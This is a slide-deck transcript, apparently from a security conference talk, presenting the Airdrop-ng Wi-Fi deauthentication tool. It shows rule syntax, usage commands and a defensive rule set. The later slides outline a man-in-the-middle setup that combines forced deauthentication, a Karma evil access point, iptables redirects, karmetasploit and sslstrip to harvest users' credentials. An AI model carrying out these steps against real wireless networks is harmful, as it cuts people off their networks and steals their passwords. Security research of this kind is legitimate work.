slide1 n.
Skip this Video
Loading SlideShow in 5 Seconds..
Airdrop-ng PowerPoint Presentation


166 Vues Download Presentation
Télécharger la présentation


- - - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript

  1. Airdrop-ng It Gets People Off

  2. Who are we? No one important, move along citizen... TheX1le Tuna Will Speak for Beer

  3. <WiFi WTF> What are we doing here? </WiFi WTF> Talk about a new tool that allows the facilitation of client control through unencrypted management frames Demonstrate some uses of Airdrop-ng Show an interesting MiTM when we are finished

  4. What does it do!?!? We have all used tools like: aireplay-ng -0 mdk3 Void11 Introducing NEW Airdrop-ng Airdrop-ng is like these tools but much better Rules are the new sliced bread! Now enriched with vitamin PWN

  5. Requirements • Aircrack-ng Suite: • airodump-ng Lorcon-Old "Lorcon 1" Wireless Card/s: • 1 card is a minimum, 2 cards are preferable Optional Speed Increase: psyco JIT

  6. Writing rules Rules are broken down in to 3 fields:  action/ap/clients 2 options for state field 5 options for ap field 5 options for clients field Leading to 50 possible rule type combinations

  7. The Rule fields: Action action/ap/client Accepts a single character action: a - allow d - deny

  8. Rule Field Actions: Allow and Deny By default Airdrop-ng allows all wireless traffic... Push Go with no rules = no fun Rules are parsed in the order they are written.  Sample rules for a slow night of drinking:  Allow beer  Deny liquor a/beer|any d/liquor|me

  9. The Fields: AP Field action/ap/client ap Field: ESSID BSSID Company OUI name value Company OUI numeric value any

  10. AP Field: Scenario action/ap/client Scenario: You do not want any clients connecting to a particular wireless network. The target uses an ESSID of Brondo. Solution: d/Brondo|any Deny access to anyone connecting to the target ap.

  11. The Fields: Client Field action/ap/client mac multiple macs ex. mac1,mac2,mac3 Company OUI name value Company OUI numeric value any

  12. The Fields: Client Field action/ap/client Scenario: deny access to Sparkle Motion for everyone but my wireless card. allow access to another access point that I am hosting. a/SparkleMotion|33:26:36:00:00:00 a/00:33:FF:44:DD:32|any d/any|any

  13. Advanced OUI Based Rules Rules based on vendor name or regex: Valid Rules: d/00:25:2C|any d/Apple Inc.|any d/apple|apple    (regex matching) a/sony|any

  14. Debug mode Turning on the -b flag enables debug mode. This prints all rule matches out to the screen and allows you to troubleshoot your rules

  15. Using Airdrop-ng Putting the pieces together....

  16. Airdrop-ng Usage

  17. Placing card in monitor mode

  18. Starting Airodump-ng

  19. Example airdrop-ng rule file

  20. Running Airdrop-ng with d/any|any and debug mode on

  21. Airdrop-ng running with debug mode turned on and d/apple|any

  22. Logging Turning on -l will log all program output to a  time stamped file in a logs folder in the current directory Used in conjunction with -b can be very useful to see what is going on

  23.  -l (that's L as in llama) switch adds logging. This creates a log directory inside your current working directory. It only outputs stdout and stderr. So if you do not have the debug switch you don't see all the rules that were triggered. Solution: Add the debug switch.

  24. Notice we have moved into the logging directory.  Reading the logs shows exactly who is kicked & the rule that kicked them.

  25. Lets Get Some People Off!!! BLAT

  26. Demo: Make AppleSauce • Steps: • put card in monitor mode • start airodump • create rule file • fire up airdrop-ng airmon-ng start wlan0 airodump-ng -w tuna --output-format csv wlan0 d/any|applepython -b -i wlan0 -t tuna-01.csv -r apple.rules laugh maniacally

  27. Airdrop-ng Possible Uses  • General Purpose Deauth tool • Keeping Apple off your network • Poor Man's WIPS • Client Control • Removing the air from the MacBook Air

  28. Poor Man's WIPS Only allow your clients to talk to your access points, thus denying the users the ability to bypass your monitoring software.

  29. Poor Man's WIPS continued Scenario: You wish to restrict your users to only your office access points. Steps: Create a list of your wireless client macs 11:22:33:44:55:66,00:11:22:33:44:55,55:44:33:22:11:00 Create the list of AP BSSID's DE:AD:BE:EF:00:00 BE:EF:DE:AD:00:00

  30. Poor Man's WIPS continued Create the rule file Allow 3 clients to talk to BE:EF:DE:AD:00:00 a/BE:EF:DE:AD:00:00|11:22:33:44:55:66,00:11:22:33:44:55,55:44:33:22:11:00 Allow 3 clients to talk to DE:AD:BE:EF:00:00 a/DE:AD:BE:EF:00:00|11:22:33:44:55:66,00:11:22:33:44:55,55:44:33:22:11:00 Deny those 3 clients to any other access points d/any|11:22:33:44:55:66,00:11:22:33:44:55,55:44:33:22:11:00 start airdrop-ng

  31. Client Control Scenario Evil AP allowed to talk to all clients     a/00:18:84:a2:eb:fd|any Allow your wireless card to talk to an AP with access to the intertubes        a/any|00:17:F3:D4:32:CC Deny clients access to all other APs     d/any|any

  32. Sound Familiar? Let's take a look back.....

  33. Being too trusting • Clients are really trusting • If you say you're network Foo, you must be, right? • It's very hard to avoid really bad behavior as a user. • Remember before? Roaming sure looks a lot like spoofing

  34.  Attacks in use Using airdrop to facilitate a MITM

  35. Description: Airdrop kicks all clients with injection interface. Clients are brought in with the Karma interface and NATed to the Internet.

  36. Add some rules... Add airdrop rules a/00:18:84:a2:eb:fd|any d/any|any This will drop all clients unless they are connected to our karma adapter.

  37. MiTM Fun • Client connects to network • All traffic is redirected into metasploit capture modules with iptables markings • Client opens browser and loads the http capture page with a redirect to google after 20 seconds • Authentication iframes are loaded and passwords are logged • An iptables rule is inserted that allows client access to port 53/dns • Port 80/http gets redirected to the sslstrip proxy • Clients are redirected through sslstrip to the Internet

  38. IPTABLES  Cheap NATing: iptables -F; iptables -t nat -F; iptables -t mangle -F iptables -t nat -A POSTROUTING -o $TUBES -j MASQUERADE Traffic Marking...hmmm sexy. Well all these bastards go to karmetasploit. iptables -I PREROUTING 1 -t nat -i $EVILLAN -j MARK --set-mark 99 iptables -t nat -A PREROUTING -m mark --mark 99 -j DNAT --to-destination Can't forget SSLStrip...Thanks Moxie. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 2222 Well they need DNS...Yes you dns tunnel outside of the network.  iptables -t nat -A PREROUTING -p tcp --destination-port 53 -j MARK --set-mark 53 iptables -t nat -A PREROUTING -p udp --destination-port 53 -j MARK --set-mark 53 All other ports that are not HTTP go back to karmetasploit. iptables -t nat -A PREROUTING -m mark --mark 69 -j DNAT --to-destination

  39. karmetasploit network Capture credentials of these services: pop3, ftp, imap, smtp, fakedns For HTTP Capture: captures saved browser passwords with a fake http service

  40. So yea karmetasploit...Where’s teh tubes iptables -I PREROUTING 2 -t nat -s -j MARK --set-mark 69 Ah the magic rule that takes people out of the karmetasploit network and gives them tubes. Not unfettered tubes though. These tubes are special. The user is now allowed to use the proper DNS server that was issued in dhcp and can access the web through the SSLstrip Proxy. Shouts HD.

  41. sslstrip network proxy all web requests and redirect http to the client while establishing an ssl tunnel to the site from the proxy  Now log into Facebook; Bitch. Shouts to Moxie.

  42. MiTM Fun Continued.... • start the setup script • bring teh internet up Al Gore style  • sets up internal gateway (iptables, nat, dhcp) • bring up karmetasploit network • mark all traffic to karmetasploit network • bring up sslstrip network

  43. Demo MiTM

  44. Future directions for Airdrop-ng • Integrated packet sniffer • No more dependency on airodump-ng • Take rules on the command line instead reading from a file • Rule based wireless fuzzing framework  • Log File time stamps

  45. Where did we go today Recap:     Clients still a very easy target     Wireless Deauth Rules = Next Sliced Bread Airdrop-ng is great for facilitating a shim for MiTM attacks & Client Control Management frame abuse is still a very viable attack vector

  46. Shouts Roamer, Marfi, Mubix, Zero_Chaos, Rel1k, LateNite, d4s, fishsticks, and mellencock For their hard work: HDM, Moxie, dragorn TheX1le: thex1le{-at-}gmail Tuna: secretpackets{-at-}gmail

  47. Pen-testing Live CD • 2009.0 Release Available at • Updated tools and drivers patched and ready • Airdrop-ng Module available in two weeks • See the Pentoo Firetalk in Wilson at 8:45pm